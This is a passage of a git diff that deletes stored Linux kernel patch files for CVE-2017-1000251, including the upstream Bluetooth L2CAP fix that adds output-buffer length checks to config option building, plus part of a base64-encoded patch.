JiBMMkNBUF9GRUFUX0ZDUykpCkBAIC0zNDE5LDcgKzM0MjMsNyBAQAogCQlpZiAocGktPmZjcyA9PSBMMkNBUF9GQ1NfTk9ORSB8fAogCQkJCXBpLT5jb25mX3N0YXRlICYgTDJDQVBfQ09ORl9OT19GQ1NfUkVDVikgewogCQkJcGktPmZjcyA9IEwyQ0FQX0ZDU19OT05FOwotCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRkNTLCAxLCBwaS0+ZmNzKTsKKwkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmZjcywgZW5kcHRyIC0gcHRyKTsKIAkJfQogCQlicmVhazsKIAl9CkBAIC0zNDMxLDEyICszNDM1LDEzIEBACiB9CiAKIAotc3RhdGljIGludCBsMmNhcF9idWlsZF9hbXBfcmVjb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX2J1aWxkX2FtcF9yZWNvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSwgc2l6ZV90IGRhdGFfc2l6ZSkKIHsKIAlzdHJ1Y3QgbDJjYXBfcGluZm8gKnBpID0gbDJjYXBfcGkoc2spOwogCXN0cnVjdCBsMmNhcF9jb25mX3JlcSAqcmVxID0gZGF0YTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZmMgcmZjID0geyAubW9kZSA9IHBpLT5tb2RlIH07CiAJdm9pZCAqcHRyID0gcmVxLT5kYXRhOworCXZvaWQgKmVuZHB0ciA9IGRhdGEgKyBkYXRhX3NpemU7CiAKIAlCVF9EQkcoInNrICVwIiwgc2spOwogCkBAIC0zNDU3LDcgKzM0NjIsNyBAQAogCX0KIAogCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX1JGQywgc2l6ZW9mKHJmYyksCi0JCQkJCQkodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkgICAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAogCWlmIChwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9GQ1MpIHsKIAkJLyogVE9ETyBhc3NpZ24gZmNzIGZvciBici9lZHIgYmFzZWQgb24gc29ja2V0IGNvbmZpZyBvcHRpb24gKi8KQEAgLTM0NjgsNyArMzQ3Myw3IEBACiAJCWVsc2UKIAkJCXBpLT5sb2NhbF9jb25mLmZjcyA9IEwyQ0FQX0ZDU19DUkMxNjsKIAotCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9GQ1MsIDEsIHBpLT5sb2NhbF9jb25mLmZjcyk7CisJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmxvY2FsX2NvbmYuZmNzLCBlbmRwdHIgLSBwdHIpOwogCQlwaS0+ZmNzID0gcGktPmxvY2FsX2NvbmYuZmNzIHwgcGktPnJlbW90ZV9jb25mLmZjczsKIAl9CiAKQEAgLTM0NzgsMTEgKzM0ODMsMTIgQEAKIAlyZXR1cm4gcHRyIC0gZGF0YTsKIH0KIAotc3RhdGljIGludCBsMmNhcF9wYXJzZV9jb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSwgc2l6ZV90IGRhdGFfc2l6ZSkKIHsKIAlzdHJ1Y3QgbDJjYXBfcGluZm8gKnBpID0gbDJjYXBfcGkoc2spOwogCXN0cnVjdCBsMmNhcF9jb25mX3JzcCAqcnNwID0gZGF0YTsKIAl2b2lkICpwdHIgPSByc3AtPmRhdGE7CisJdm9pZCAqZW5kcHRyID0gZGF0YSArIGRhdGFfc2l6ZTsKIAl2b2lkICpyZXEgPSBwaS0+Y29uZl9yZXE7CiAJaW50IGxlbiA9IHBpLT5jb25mX2xlbjsKIAlpbnQgdHlwZSwgaGludCwgb2xlbjsKQEAgLTM2MDUsNyArMzYxMSw4IEBACiAJCQlyZXR1cm4gLUVDT05OUkVGVVNFRDsKIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsCi0JCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJICAgc2l6ZW9mKHJmYyksICh1bnNpZ25lZCBsb25nKSAmcmZjLAorCQkJCSAgIGVuZHB0ciAtIHB0cik7CiAJfQogCiAKQEAgLTM2MjQsNyArMzYzMSw3IEBACiAJCQlwaS0+b210dSA9IG10dTsKIAkJCXBpLT5jb25mX3N0YXRlIHw9IEwyQ0FQX0NPTkZfTVRVX0RPTkU7CiAJCX0KLQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+b210dSk7CisJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPm9tdHUsIGVuZHB0ciAtIHB0cik7CiAKIAkJc3dpdGNoIChyZmMubW9kZSkgewogCQljYXNlIEwyQ0FQX01PREVfQkFTSUM6CkBAIC0zNjQyLDExICszNjQ5LDExIEBACiAJCQlwaS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX01PREVfRE9ORTsKIAogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLAotCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJCWlmIChwaS0+Y29uZl9zdGF0ZSAmIEwyQ0FQX0NPTkZfTE9DS1NURVApCiAJCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX0ZTLAotCQkJCQlzaXplb2YoZnMpLCAodW5zaWduZWQgbG9uZykgJmZzKTsKKwkJCQkJc2l6ZW9mKGZzKSwgKHVuc2lnbmVkIGxvbmcpICZmcywgZW5kcHRyIC0gcHRyKTsKIAogCQkJYnJlYWs7CiAKQEAgLTM2NTYsNyArMzY2Myw3IEBACiAJCQlwaS0+Y29uZl9zdGF0ZSB8PSBMMkNBUF9DT05GX01PREVfRE9ORTsKIAogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLAotCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCQlzaXplb2YocmZjKSwgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJCWJyZWFrOwogCkBAIC0zNjk2LDExICszNzAzLDEyIEBACiAJcmV0dXJuIHB0ciAtIGRhdGE7CiB9CiAKLXN0YXRpYyBpbnQgbDJjYXBfcGFyc2VfYW1wX21vdmVfcmVjb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2FtcF9tb3ZlX3JlY29uZl9yZXEoc3RydWN0IHNvY2sgKnNrLCB2b2lkICpkYXRhLCBzaXplX3QgZGF0YV9zaXplKQogewogCXN0cnVjdCBsMmNhcF9waW5mbyAqcGkgPSBsMmNhcF9waShzayk7CiAJc3RydWN0IGwyY2FwX2NvbmZfcnNwICpyc3AgPSBkYXRhOwogCXZvaWQgKnB0ciA9IHJzcC0+ZGF0YTsKKwl2b2lkICplbmRwdHIgPSBkYXRhICsgZGF0YV9zaXplOwogCXZvaWQgKnJlcSA9IHBpLT5jb25mX3JlcTsKIAlpbnQgbGVuID0gcGktPmNvbmZfbGVuOwogCWludCB0eXBlLCBoaW50LCBvbGVuOwpAQCAtMzc4NywxMyArMzc5NSwxMyBAQAogCiAJCUJUX0RCRygibXR1ICVkIG9tdHUgJWQiLCBtdHUsIHBpLT5vbXR1KTsKIAotCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9NVFUsIDIsIHBpLT5vbXR1KTsKKwkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+b210dSwgZW5kcHRyIC0gcHRyKTsKIAogCQkvKiBEb24ndCBhbGxvdyBleHRlbmRlZCB0cmFuc21pdCB3aW5kb3cgdG8gY2hhbmdlLiAqLwogCQlpZiAodHhfd2luICE9IHBpLT5yZW1vdGVfdHhfd2luKSB7CiAJCQlyZXN1bHQgPSBMMkNBUF9DT05GX1VOQUNDRVBUOwogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwKLQkJCQkJcGktPnJlbW90ZV90eF93aW4pOworCQkJCQlwaS0+cmVtb3RlX3R4X3dpbiwgZW5kcHRyIC0gcHRyKTsKIAkJfQogCiAJCXBpLT5yZW1vdGVfbXBzID0gcmZjLm1heF9wZHVfc2l6ZTsKQEAgLTM4MDYsNyArMzgxNCw3IEBACiAJCX0KIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsCi0JCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAl9CiAKIAlpZiAocmVzdWx0ICE9IEwyQ0FQX0NPTkZfU1VDQ0VTUykKQEAgLTM4MjUsMTEgKzM4MzMsMTIgQEAKIAlyZXR1cm4gcHRyIC0gZGF0YTsKIH0KIAotc3RhdGljIGludCBsMmNhcF9wYXJzZV9jb25mX3JzcChzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKnJzcCwgaW50IGxlbiwgdm9pZCAqZGF0YSwgdTE2ICpyZXN1bHQpCitzdGF0aWMgaW50IGwyY2FwX3BhcnNlX2NvbmZfcnNwKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqcnNwLCBpbnQgbGVuLCB2b2lkICpkYXRhLCBzaXplX3Qgc2l6ZSwgdTE2ICpyZXN1bHQpCiB7CiAJc3RydWN0IGwyY2FwX3BpbmZvICpwaSA9IGwyY2FwX3BpKHNrKTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZXEgKnJlcSA9IGRhdGE7CiAJdm9pZCAqcHRyID0gcmVxLT5kYXRhOworCXZvaWQgKmVuZHB0ciA9IGRhdGEgKyBzaXplOwogCWludCB0eXBlLCBvbGVuOwogCXVuc2lnbmVkIGxvbmcgdmFsOwogCXN0cnVjdCBsMmNhcF9jb25mX3JmYyByZmM7CkBAIC0zODUyLDEzICszODYxLDEzIEBACiAJCQkJcGktPmltdHUgPSBMMkNBUF9ERUZBVUxUX01JTl9NVFU7CiAJCQl9IGVsc2UKIAkJCQlwaS0+aW10dSA9IHZhbDsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPmltdHUpOworCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfTVRVLCAyLCBwaS0+aW10dSwgZW5kcHRyIC0gcHRyKTsKIAkJCWJyZWFrOwogCiAJCWNhc2UgTDJDQVBfQ09ORl9GTFVTSF9UTzoKIAkJCXBpLT5mbHVzaF90byA9IHZhbDsKIAkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZMVVNIX1RPLAotCQkJCQkJCTIsIHBpLT5mbHVzaF90byk7CisJCQkJCQkJMiwgcGktPmZsdXNoX3RvLCBlbmRwdHIgLSBwdHIpOwogCQkJYnJlYWs7CiAKIAkJY2FzZSBMMkNBUF9DT05GX1JGQzoKQEAgLTM4NzIsMTQgKzM4ODEsMTQgQEAKIAkJCXBpLT5mY3MgPSAwOwogCiAJCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsCi0JCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJCXNpemVvZihyZmMpLCAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAkJCWJyZWFrOwogCiAJCWNhc2UgTDJDQVBfQ09ORl9FWFRfV0lORE9XOgogCQkJcGktPmFja193aW4gPSBtaW5fdCh1MTYsIHZhbCwgcGktPmFja193aW4pOwogCiAJCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9FWFRfV0lORE9XLAotCQkJCQkyLCBwaS0+dHhfd2luKTsKKwkJCQkJMiwgcGktPnR4X3dpbiwgZW5kcHRyIC0gcHRyKTsKIAkJCWJyZWFrOwogCiAJCWRlZmF1bHQ6CkBAIC00MjYyLDcgKzQyNzEsNyBAQAogCQl1OCBidWZbMTI4XTsKIAkJbDJjYXBfcGkoc2spLT5jb25mX3N0YXRlIHw9IEwyQ0FQX0NPTkZfUkVRX1NFTlQ7CiAJCWwyY2FwX3NlbmRfY21kKGNvbm4sIGwyY2FwX2dldF9pZGVudChjb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYpLCBidWYpOworCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmLCBzaXplb2YoYnVmKSksIGJ1Zik7CiAJCWwyY2FwX3BpKHNrKS0+bnVtX2NvbmZfcmVxKys7CiAJfQogCkBAIC00MzIwLDcgKzQzMjksNyBAQAogCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAogCQlsMmNhcF9zZW5kX2NtZChjb25uLCBsMmNhcF9nZXRfaWRlbnQoY29ubiksIEwyQ0FQX0NPTkZfUkVRLAotCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgcmVxKSwgcmVxKTsKKwkJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIHJlcSwgc2l6ZW9mKHJlcSkpLCByZXEpOwogCQlsMmNhcF9waShzayktPm51bV9jb25mX3JlcSsrOwogCQlicmVhazsKIApAQCAtNDQyNyw5ICs0NDM2LDkgQEAKIAogCS8qIENvbXBsZXRlIGNvbmZpZy4gKi8KIAlpZiAoIWFtcF9tb3ZlX3JlY29uZikKLQkJbGVuID0gbDJjYXBfcGFyc2VfY29uZl9yZXEoc2ssIHJzcGJ1Zik7CisJCWxlbiA9IGwyY2FwX3BhcnNlX2NvbmZfcmVxKHNrLCByc3BidWYsIHNpemVvZihyc3BidWYpKTsKIAllbHNlCi0JCWxlbiA9IGwyY2FwX3BhcnNlX2FtcF9tb3ZlX3JlY29uZl9yZXEoc2ssIHJzcGJ1Zik7CisJCWxlbiA9IGwyY2FwX3BhcnNlX2FtcF9tb3ZlX3JlY29uZl9yZXEoc2ssIHJzcGJ1Ziwgc2l6ZW9mKHJzcGJ1ZikpOwogCiAJaWYgKGxlbiA8IDApIHsKIAkJbDJjYXBfc2VuZF9kaXNjb25uX3JlcShjb25uLCBzaywgRUNPTk5SRVNFVCk7CkBAIC00NDc4LDcgKzQ0ODcsNyBAQAogCQl1OCBidWZbNjRdOwogCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAkJbDJjYXBfc2VuZF9jbWQoY29ubiwgbDJjYXBfZ2V0X2lkZW50KGNvbm4pLCBMMkNBUF9DT05GX1JFUSwKLQkJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1ZiksIGJ1Zik7CisJCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwgYnVmKTsKIAkJbDJjYXBfcGkoc2spLT5udW1fY29uZl9yZXErKzsKIAl9CiAKQEAgLTQ1NzUsNyArNDU4NCw3IEBACiAJCQkvKiB0aHJvdyBvdXQgYW55IG9sZCBzdG9yZWQgY29uZiByZXF1ZXN0cyAqLwogCQkJcmVzdWx0ID0gTDJDQVBfQ09ORl9TVUNDRVNTOwogCQkJbGVuID0gbDJjYXBfcGFyc2VfY29uZl9yc3Aoc2ssIHJzcC0+ZGF0YSwKLQkJCQkJCQlsZW4sIHJlcSwgJnJlc3VsdCk7CisJCQkJCQkJbGVuLCByZXEsIHNpemVvZihyZXEpLCAmcmVzdWx0KTsKIAkJCWlmIChsZW4gPCAwKSB7CiAJCQkJbDJjYXBfc2VuZF9kaXNjb25uX3JlcShjb25uLCBzaywgRUNPTk5SRVNFVCk7CiAJCQkJZ290byBkb25lOwpAQCAtNTM5Nyw3ICs1NDA2LDcgQEAKIAkJCQlsMmNhcF9zZW5kX2NtZChwaS0+Y29ubiwKIAkJCQkJbDJjYXBfZ2V0X2lkZW50KHBpLT5jb25uKSwKIAkJCQkJTDJDQVBfQ09ORl9SRVEsCi0JCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYpLCBidWYpOworCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmLCBzaXplb2YoYnVmKSksIGJ1Zik7CiAJCQkJbDJjYXBfcGkoc2spLT5udW1fY29uZl9yZXErKzsKIAkJCX0KIAkJfSBlbHNlIHsKQEAgLTY5NTksNyArNjk2OCw3IEBACiAJcGkgPSBsMmNhcF9waShzayk7CiAKIAlsMmNhcF9zZW5kX2NtZChwaS0+Y29ubiwgbDJjYXBfZ2V0X2lkZW50KHBpLT5jb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJbDJjYXBfYnVpbGRfYW1wX3JlY29uZl9yZXEoc2ssIGJ1ZiksIGJ1Zik7CisJCQkJbDJjYXBfYnVpbGRfYW1wX3JlY29uZl9yZXEoc2ssIGJ1Ziwgc2l6ZW9mKGJ1ZikpLCBidWYpOwogCXJldHVybiBlcnI7CiB9CiAKQEAgLTc2OTQsNyArNzcwMyw3IEBACiAJCQkJbDJjYXBfcGkoc2spLT5jb25mX3N0YXRlIHw9IEwyQ0FQX0NPTkZfUkVRX1NFTlQ7CiAJCQkJbDJjYXBfc2VuZF9jbWQoY29ubiwgbDJjYXBfZ2V0X2lkZW50KGNvbm4pLAogCQkJCQkgICAgICAgTDJDQVBfQ09ORl9SRVEsCi0JCQkJCSAgICAgICBsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmKSwKKwkJCQkJICAgICAgIGwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwKIAkJCQkJICAgICAgIGJ1Zik7CiAJCQkJbDJjYXBfcGkoc2spLT5udW1fY29uZl9yZXErKzsKIAkJCX0KZGlmZiAtLWdpdCBhL25ldC9ibHVldG9vdGgvbDJjYXBfc29jay5jIGIvbmV0L2JsdWV0b290aC9sMmNhcF9zb2NrLmMKaW5kZXggNmRhNDk0Zi4uYmFmMWFmNyAxMDA2NDQKLS0tIGEvbmV0L2JsdWV0b290aC9sMmNhcF9zb2NrLmMKKysrIGIvbmV0L2JsdWV0b290aC9sMmNhcF9zb2NrLmMKQEAgLTEwMzYsNyArMTAzNiw3IEBACiAKIAkJbDJjYXBfcGkoc2spLT5jb25mX3N0YXRlIHw9IEwyQ0FQX0NPTkZfUkVRX1NFTlQ7CiAJCWwyY2FwX3NlbmRfY21kKGNvbm4sIGwyY2FwX2dldF9pZGVudChjb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1ZiksIGJ1Zik7CisJCQkJbDJjYXBfYnVpbGRfY29uZl9yZXEoc2ssIGJ1Ziwgc2l6ZW9mKGJ1ZikpLCBidWYpOwogCQlsMmNhcF9waShzayktPm51bV9jb25mX3JlcSsrOwogCiAJCXJlbGVhc2Vfc29jayhzayk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch
deleted file mode 100644
index c6bfdf71..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch
+++ /dev/null
@@ -1,357 +0,0 @@
-From e860d2c904d1a9f38a24eb44c9f34b8f915a6ea3 Mon Sep 17 00:00:00 2001
-From: Ben Seri <ben@armis.com>
-Date: Sat, 9 Sep 2017 23:15:59 +0200
-Subject: Bluetooth: Properly check L2CAP config option output buffer length
-
-Validate the output buffer length for L2CAP config requests and responses
-to avoid overflowing the stack buffer used for building the option blocks.
-
-Cc: stable@vger.kernel.org
-Signed-off-by: Ben Seri <ben@armis.com>
-Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- net/bluetooth/l2cap_core.c | 80 +++++++++++++++++++++++++---------------------
- 1 file changed, 43 insertions(+), 37 deletions(-)
-
-diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
-index 303c779..43ba91c 100644
---- a/net/bluetooth/l2cap_core.c
-+++ b/net/bluetooth/l2cap_core.c
-@@ -58,7 +58,7 @@ static struct sk_buff *l2cap_build_cmd(struct l2cap_conn *conn,
- 				       u8 code, u8 ident, u16 dlen, void *data);
- static void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len,
- 			   void *data);
--static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data);
-+static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data, size_t data_size);
- static void l2cap_send_disconn_req(struct l2cap_chan *chan, int err);
- 
- static void l2cap_tx(struct l2cap_chan *chan, struct l2cap_ctrl *control,
-@@ -1473,7 +1473,7 @@ static void l2cap_conn_start(struct l2cap_conn *conn)
- 
- 			set_bit(CONF_REQ_SENT, &chan->conf_state);
- 			l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--				       l2cap_build_conf_req(chan, buf), buf);
-+				       l2cap_build_conf_req(chan, buf, sizeof(buf)), buf);
- 			chan->num_conf_req++;
- 		}
- 
-@@ -2987,12 +2987,15 @@ static inline int l2cap_get_conf_opt(void **ptr, int *type, int *olen,
- 	return len;
- }
- 
--static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val)
-+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size)
- {
- 	struct l2cap_conf_opt *opt = *ptr;
- 
- 	BT_DBG("type 0x%2.2x len %u val 0x%lx", type, len, val);
- 
-+	if (size < L2CAP_CONF_OPT_SIZE + len)
-+		return;
-+
- 	opt->type = type;
- 	opt->len  = len;
- 
-@@ -3017,7 +3020,7 @@ static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val)
- 	*ptr += L2CAP_CONF_OPT_SIZE + len;
- }
- 
--static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan)
-+static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan, size_t size)
- {
- 	struct l2cap_conf_efs efs;
- 
-@@ -3045,7 +3048,7 @@ static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan)
- 	}
- 
- 	l2cap_add_conf_opt(ptr, L2CAP_CONF_EFS, sizeof(efs),
--			   (unsigned long) &efs);
-+			   (unsigned long) &efs, size);
- }
- 
- static void l2cap_ack_timeout(struct work_struct *work)
-@@ -3191,11 +3194,12 @@ static inline void l2cap_txwin_setup(struct l2cap_chan *chan)
- 	chan->ack_win = chan->tx_win;
- }
- 
--static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data)
-+static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data, size_t data_size)
- {
- 	struct l2cap_conf_req *req = data;
- 	struct l2cap_conf_rfc rfc = { .mode = chan->mode };
- 	void *ptr = req->data;
-+	void *endptr = data + data_size;
- 	u16 size;
- 
- 	BT_DBG("chan %p", chan);
-@@ -3220,7 +3224,7 @@ static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data)
- 
- done:
- 	if (chan->imtu != L2CAP_DEFAULT_MTU)
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu, endptr - ptr);
- 
- 	switch (chan->mode) {
- 	case L2CAP_MODE_BASIC:
-@@ -3239,7 +3243,7 @@ done:
- 		rfc.max_pdu_size    = 0;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--				   (unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 		break;
- 
- 	case L2CAP_MODE_ERTM:
-@@ -3259,21 +3263,21 @@ done:
- 				       L2CAP_DEFAULT_TX_WINDOW);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--				   (unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if (test_bit(FLAG_EFS_ENABLE, &chan->flags))
--			l2cap_add_opt_efs(&ptr, chan);
-+			l2cap_add_opt_efs(&ptr, chan, endptr - ptr);
- 
- 		if (test_bit(FLAG_EXT_CTRL, &chan->flags))
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EWS, 2,
--					   chan->tx_win);
-+					   chan->tx_win, endptr - ptr);
- 
- 		if (chan->conn->feat_mask & L2CAP_FEAT_FCS)
- 			if (chan->fcs == L2CAP_FCS_NONE ||
- 			    test_bit(CONF_RECV_NO_FCS, &chan->conf_state)) {
- 				chan->fcs = L2CAP_FCS_NONE;
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1,
--						   chan->fcs);
-+						   chan->fcs, endptr - ptr);
- 			}
- 		break;
- 
-@@ -3291,17 +3295,17 @@ done:
- 		rfc.max_pdu_size = cpu_to_le16(size);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--				   (unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if (test_bit(FLAG_EFS_ENABLE, &chan->flags))
--			l2cap_add_opt_efs(&ptr, chan);
-+			l2cap_add_opt_efs(&ptr, chan, endptr - ptr);
- 
- 		if (chan->conn->feat_mask & L2CAP_FEAT_FCS)
- 			if (chan->fcs == L2CAP_FCS_NONE ||
- 			    test_bit(CONF_RECV_NO_FCS, &chan->conf_state)) {
- 				chan->fcs = L2CAP_FCS_NONE;
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1,
--						   chan->fcs);
-+						   chan->fcs, endptr - ptr);
- 			}
- 		break;
- 	}
-@@ -3312,10 +3316,11 @@ done:
- 	return ptr - data;
- }
- 
--static int l2cap_parse_conf_req(struct l2cap_chan *chan, void *data)
-+static int l2cap_parse_conf_req(struct l2cap_chan *chan, void *data, size_t data_size)
- {
- 	struct l2cap_conf_rsp *rsp = data;
- 	void *ptr = rsp->data;
-+	void *endptr = data + data_size;
- 	void *req = chan->conf_req;
- 	int len = chan->conf_len;
- 	int type, hint, olen;
-@@ -3417,7 +3422,7 @@ done:
- 			return -ECONNREFUSED;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--				   (unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 	}
- 
- 	if (result == L2CAP_CONF_SUCCESS) {
-@@ -3430,7 +3435,7 @@ done:
- 			chan->omtu = mtu;
- 			set_bit(CONF_MTU_DONE, &chan->conf_state);
- 		}
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu, endptr - ptr);
- 
- 		if (remote_efs) {
- 			if (chan->local_stype != L2CAP_SERV_NOTRAFIC &&
-@@ -3444,7 +3449,7 @@ done:
- 
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS,
- 						   sizeof(efs),
--						   (unsigned long) &efs);
-+						   (unsigned long) &efs, endptr - ptr);
- 			} else {
- 				/* Send PENDING Conf Rsp */
- 				result = L2CAP_CONF_PENDING;
-@@ -3477,7 +3482,7 @@ done:
- 			set_bit(CONF_MODE_DONE, &chan->conf_state);
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					   sizeof(rfc), (unsigned long) &rfc);
-+					   sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 
- 			if (test_bit(FLAG_EFS_ENABLE, &chan->flags)) {
- 				chan->remote_id = efs.id;
-@@ -3491,7 +3496,7 @@ done:
- 					le32_to_cpu(efs.sdu_itime);
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS,
- 						   sizeof(efs),
--						   (unsigned long) &efs);
-+						   (unsigned long) &efs, endptr - ptr);
- 			}
- 			break;
- 
-@@ -3505,7 +3510,7 @@ done:
- 			set_bit(CONF_MODE_DONE, &chan->conf_state);
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--					   (unsigned long) &rfc);
-+					   (unsigned long) &rfc, endptr - ptr);
- 
- 			break;
- 
-@@ -3527,10 +3532,11 @@ done:
- }
- 
